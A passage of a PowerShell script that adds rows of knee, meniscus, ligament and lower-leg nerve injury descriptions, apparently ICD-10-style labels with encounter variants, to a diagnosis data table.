dislocation of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left knee","Other dislocation of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified knee","Other dislocation of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified knee","Other dislocation of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified knee","Other dislocation of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, right knee","Bucket-handle tear of unspecified meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, right knee","Bucket-handle tear of unspecified meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, right knee","Bucket-handle tear of unspecified meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, left knee","Bucket-handle tear of unspecified meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, left knee","Bucket-handle tear of unspecified meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, left knee","Bucket-handle tear of unspecified meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, unspecified knee","Bucket-handle tear of unspecified meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, unspecified knee","Bucket-handle tear of unspecified meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of unspecified meniscus, current injury, unspecified knee","Bucket-handle tear of unspecified meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, right knee","Other tear of unspecified meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, right knee","Other tear of unspecified meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, right knee","Other tear of unspecified meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, left knee","Other tear of unspecified meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, left knee","Other tear of unspecified meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, left knee","Other tear of unspecified meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, unspecified knee","Other tear of unspecified meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, unspecified knee","Other tear of unspecified meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of unspecified meniscus, current injury, unspecified knee","Other tear of unspecified meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, right knee","Unspecified tear of unspecified meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, right knee","Unspecified tear of unspecified meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, right knee","Unspecified tear of unspecified meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, left knee","Unspecified tear of unspecified meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, left knee","Unspecified tear of unspecified meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, left knee","Unspecified tear of unspecified meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, unspecified knee","Unspecified tear of unspecified meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, unspecified knee","Unspecified tear of unspecified meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified tear of unspecified meniscus, current injury, unspecified knee","Unspecified tear of unspecified meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, right knee","Bucket-handle tear of medial meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, right knee","Bucket-handle tear of medial meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, right knee","Bucket-handle tear of medial meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, left knee","Bucket-handle tear of medial meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, left knee","Bucket-handle tear of medial meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, left knee","Bucket-handle tear of medial meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, unspecified knee","Bucket-handle tear of medial meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, unspecified knee","Bucket-handle tear of medial meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of medial meniscus, current injury, unspecified knee","Bucket-handle tear of medial meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, right knee","Peripheral tear of medial meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, right knee","Peripheral tear of medial meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, right knee","Peripheral tear of medial meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, left knee","Peripheral tear of medial meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, left knee","Peripheral tear of medial meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, left knee","Peripheral tear of medial meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, unspecified knee","Peripheral tear of medial meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, unspecified knee","Peripheral tear of medial meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of medial meniscus, current injury, unspecified knee","Peripheral tear of medial meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, right knee","Complex tear of medial meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, right knee","Complex tear of medial meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, right knee","Complex tear of medial meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, left knee","Complex tear of medial meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, left knee","Complex tear of medial meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, left knee","Complex tear of medial meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, unspecified knee","Complex tear of medial meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, unspecified knee","Complex tear of medial meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of medial meniscus, current injury, unspecified knee","Complex tear of medial meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, right knee","Other tear of medial meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, right knee","Other tear of medial meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, right knee","Other tear of medial meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, left knee","Other tear of medial meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, left knee","Other tear of medial meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, left knee","Other tear of medial meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, unspecified knee","Other tear of medial meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, unspecified knee","Other tear of medial meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of medial meniscus, current injury, unspecified knee","Other tear of medial meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, right knee","Bucket-handle tear of lateral meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, right knee","Bucket-handle tear of lateral meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, right knee","Bucket-handle tear of lateral meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, left knee","Bucket-handle tear of lateral meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, left knee","Bucket-handle tear of lateral meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, left knee","Bucket-handle tear of lateral meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, unspecified knee","Bucket-handle tear of lateral meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, unspecified knee","Bucket-handle tear of lateral meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bucket-handle tear of lateral meniscus, current injury, unspecified knee","Bucket-handle tear of lateral meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, right knee","Peripheral tear of lateral meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, right knee","Peripheral tear of lateral meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, right knee","Peripheral tear of lateral meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, left knee","Peripheral tear of lateral meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, left knee","Peripheral tear of lateral meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, left knee","Peripheral tear of lateral meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, unspecified knee","Peripheral tear of lateral meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, unspecified knee","Peripheral tear of lateral meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Peripheral tear of lateral meniscus, current injury, unspecified knee","Peripheral tear of lateral meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, right knee","Complex tear of lateral meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, right knee","Complex tear of lateral meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, right knee","Complex tear of lateral meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, left knee","Complex tear of lateral meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, left knee","Complex tear of lateral meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, left knee","Complex tear of lateral meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, unspecified knee","Complex tear of lateral meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, unspecified knee","Complex tear of lateral meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complex tear of lateral meniscus, current injury, unspecified knee","Complex tear of lateral meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, right knee","Other tear of lateral meniscus, current injury, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, right knee","Other tear of lateral meniscus, current injury, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, right knee","Other tear of lateral meniscus, current injury, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, left knee","Other tear of lateral meniscus, current injury, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, left knee","Other tear of lateral meniscus, current injury, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, left knee","Other tear of lateral meniscus, current injury, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, unspecified knee","Other tear of lateral meniscus, current injury, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, unspecified knee","Other tear of lateral meniscus, current injury, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other tear of lateral meniscus, current injury, unspecified knee","Other tear of lateral meniscus, current injury, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of unspecified knee, current","Tear of articular cartilage of unspecified knee, current, initial encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of unspecified knee, current","Tear of articular cartilage of unspecified knee, current, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of unspecified knee, current","Tear of articular cartilage of unspecified knee, current, sequela") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of right knee, current","Tear of articular cartilage of right knee, current, initial encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of right knee, current","Tear of articular cartilage of right knee, current, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of right knee, current","Tear of articular cartilage of right knee, current, sequela") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of left knee, current","Tear of articular cartilage of left knee, current, initial encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of left knee, current","Tear of articular cartilage of left knee, current, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Tear of articular cartilage of left knee, current","Tear of articular cartilage of left knee, current, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of right knee","Sprain of unspecified collateral ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of right knee","Sprain of unspecified collateral ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of right knee","Sprain of unspecified collateral ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of left knee","Sprain of unspecified collateral ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of left knee","Sprain of unspecified collateral ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of left knee","Sprain of unspecified collateral ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of unspecified knee","Sprain of unspecified collateral ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of unspecified knee","Sprain of unspecified collateral ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified collateral ligament of unspecified knee","Sprain of unspecified collateral ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of right knee","Sprain of medial collateral ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of right knee","Sprain of medial collateral ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of right knee","Sprain of medial collateral ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of left knee","Sprain of medial collateral ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of left knee","Sprain of medial collateral ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of left knee","Sprain of medial collateral ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of unspecified knee","Sprain of medial collateral ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of unspecified knee","Sprain of medial collateral ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of medial collateral ligament of unspecified knee","Sprain of medial collateral ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of right knee","Sprain of lateral collateral ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of right knee","Sprain of lateral collateral ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of right knee","Sprain of lateral collateral ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of left knee","Sprain of lateral collateral ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of left knee","Sprain of lateral collateral ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of left knee","Sprain of lateral collateral ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of unspecified knee","Sprain of lateral collateral ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of unspecified knee","Sprain of lateral collateral ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of lateral collateral ligament of unspecified knee","Sprain of lateral collateral ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of right knee","Sprain of unspecified cruciate ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of right knee","Sprain of unspecified cruciate ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of right knee","Sprain of unspecified cruciate ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of left knee","Sprain of unspecified cruciate ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of left knee","Sprain of unspecified cruciate ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of left knee","Sprain of unspecified cruciate ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of unspecified knee","Sprain of unspecified cruciate ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of unspecified knee","Sprain of unspecified cruciate ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified cruciate ligament of unspecified knee","Sprain of unspecified cruciate ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of right knee","Sprain of anterior cruciate ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of right knee","Sprain of anterior cruciate ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of right knee","Sprain of anterior cruciate ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of left knee","Sprain of anterior cruciate ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of left knee","Sprain of anterior cruciate ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of left knee","Sprain of anterior cruciate ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of unspecified knee","Sprain of anterior cruciate ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of unspecified knee","Sprain of anterior cruciate ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of anterior cruciate ligament of unspecified knee","Sprain of anterior cruciate ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of right knee","Sprain of posterior cruciate ligament of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of right knee","Sprain of posterior cruciate ligament of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of right knee","Sprain of posterior cruciate ligament of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of left knee","Sprain of posterior cruciate ligament of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of left knee","Sprain of posterior cruciate ligament of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of left knee","Sprain of posterior cruciate ligament of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of unspecified knee","Sprain of posterior cruciate ligament of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of unspecified knee","Sprain of posterior cruciate ligament of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of posterior cruciate ligament of unspecified knee","Sprain of posterior cruciate ligament of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, unspecified knee","Sprain of the superior tibiofibular joint and ligament, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, unspecified knee","Sprain of the superior tibiofibular joint and ligament, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, unspecified knee","Sprain of the superior tibiofibular joint and ligament, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, right knee","Sprain of the superior tibiofibular joint and ligament, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, right knee","Sprain of the superior tibiofibular joint and ligament, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, right knee","Sprain of the superior tibiofibular joint and ligament, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, left knee","Sprain of the superior tibiofibular joint and ligament, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, left knee","Sprain of the superior tibiofibular joint and ligament, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of the superior tibiofibular joint and ligament, left knee","Sprain of the superior tibiofibular joint and ligament, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right knee","Sprain of other specified parts of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right knee","Sprain of other specified parts of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right knee","Sprain of other specified parts of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left knee","Sprain of other specified parts of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left knee","Sprain of other specified parts of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left knee","Sprain of other specified parts of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified knee","Sprain of other specified parts of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified knee","Sprain of other specified parts of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified knee","Sprain of other specified parts of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of unspecified knee","Sprain of unspecified site of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of unspecified knee","Sprain of unspecified site of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of unspecified knee","Sprain of unspecified site of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of right knee","Sprain of unspecified site of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of right knee","Sprain of unspecified site of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of right knee","Sprain of unspecified site of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of left knee","Sprain of unspecified site of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of left knee","Sprain of unspecified site of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified site of left knee","Sprain of unspecified site of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, unspecified leg","Injury of tibial nerve at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, unspecified leg","Injury of tibial nerve at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, unspecified leg","Injury of tibial nerve at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, right leg","Injury of tibial nerve at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, right leg","Injury of tibial nerve at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, right leg","Injury of tibial nerve at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, left leg","Injury of tibial nerve at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, left leg","Injury of tibial nerve at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of tibial nerve at lower leg level, left leg","Injury of tibial nerve at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, unspecified leg","Injury of peroneal nerve at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, unspecified leg","Injury of peroneal nerve at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, unspecified leg","Injury of peroneal nerve at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, right leg","Injury of peroneal nerve at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, right leg","Injury of peroneal nerve at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, right leg","Injury of peroneal nerve at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, left leg","Injury of peroneal nerve at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, left leg","Injury of peroneal nerve at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peroneal nerve at lower leg level, left leg","Injury of peroneal nerve at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, unspecified leg","Injury of cutaneous sensory nerve at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, unspecified leg","Injury of cutaneous sensory nerve at lower leg level, unspecified leg, subsequent encounter") + $null = 